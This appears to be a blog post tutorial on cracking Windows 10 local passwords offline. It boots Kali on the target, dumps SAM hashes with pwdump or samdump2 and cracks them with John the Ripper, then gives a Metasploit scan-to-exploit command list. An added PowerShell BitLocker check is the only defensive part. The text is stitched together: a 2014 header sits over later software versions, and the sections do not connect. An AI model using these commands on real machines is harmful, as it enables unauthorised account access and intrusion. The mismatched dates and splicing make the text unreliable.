All posts for the month October, 2014

It appears the 1607 build of Windows 10 breaks the cracking of passwords with pwdump and samdump2.

To crack a Windows 10 Local account password in Kali Linux 2.0 you will need to mount the drive, locate the directory containing the SAM file, dump the password hashes to a file, and then crack with John the Ripper.

Restart the target Windows computer into your Kali Linux 2.0 system. From time to time, when you try to access the hard drive containing the Windows partition, you may receive an error message related to the Windows hibernation file. To avoid this, shut down Windows from the command prompt with the command:

shutdown /s /t 0

This should prevent the hibernation file problem. Once you are in Kali, open Files and select your Windows hard drive to mount it. Open a terminal window and enter the command

mount

to determine the path to your Windows hard drive. Most of the time the Windows hard drive will be the last mount point in the list, normally a device such as /dev/sda1, mounted at a path such as /media/root/OSDisk. Browse to the Windows/System32/config folder under that mount point. Use the following command to create a dump of the Windows password hashes:

pwdump SYSTEM SAM > /root/Desktop/SAM2

Then use John the Ripper to crack the hashes (the format option takes two dashes):

john /root/Desktop/SAM2 --format=NT


For Kali Linux prior to version 2.0

Open a terminal
Open the drive in Computer so it will mount
Run mount to see the location of the drive
Change to the Windows/System32/config folder under the mount point

bkhive SYSTEM /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt

john /root/hash.txt --format=nt2
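Both procedures above depend on the same condition: the Windows volume is unencrypted, so a boot disk can read the SAM and SYSTEM hives. The check below is an added PowerShell example, not part of the original post; it reports whether the OS volume is protected by BitLocker and assumes an elevated shell and the BitLocker module that ships with Windows Pro/Enterprise:

```powershell
# Added example (not from the original post): report whether the OS volume is
# protected by BitLocker, which is what stops an offline boot from reading
# Windows\System32\config\SAM and SYSTEM. Assumes the BitLocker module is
# present (Windows Pro/Enterprise) and the shell is elevated.
function Get-OfflineSamExposure {
    [CmdletBinding()]
    param(
        # Drive letter of the Windows volume; defaults to the running system drive.
        [string]$MountPoint = $env:SystemDrive
    )

    $vol = Get-BitLockerVolume -MountPoint $MountPoint -ErrorAction Stop

    # ProtectionStatus 'On' means the key protectors are active. 'Off' means the
    # volume is either unencrypted or encrypted with protection suspended (clear
    # key on disk); an offline boot can read the SAM hive in both cases.
    $protected = ($vol.ProtectionStatus -eq 'On') -and
                 ($vol.VolumeStatus -eq 'FullyEncrypted')

    [pscustomobject]@{
        MountPoint         = $vol.MountPoint
        VolumeStatus       = $vol.VolumeStatus
        ProtectionStatus   = $vol.ProtectionStatus
        KeyProtectors      = ($vol.KeyProtector |
                                ForEach-Object { $_.KeyProtectorType }) -join ','
        SamReadableOffline = -not $protected
    }
}

# Usage: SamReadableOffline = True means the hives can be dumped as shown above.
Get-OfflineSamExposure | Format-List
```

If Get-BitLockerVolume fails with a module-not-found error, the edition of Windows does not include BitLocker and the volume should be treated as readable offline.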

service postgresql start # start the database
service metasploit start # connect Metasploit to the database
# The remaining commands are entered inside msfconsole
db_rebuild_cache # build the module cache for searching
db_status # check the status of the database connection
db_nmap <target IP> # scan the target and add its open ports to the database
hosts # show scanned targets
services # show services on the targets
search <service name> # find a possible exploit module
use exploit/<exploit name> # select the exploit module
show options # list the options to configure, e.g. set RHOST
check # test whether the target appears exploitable without running the exploit
exploit # run the exploit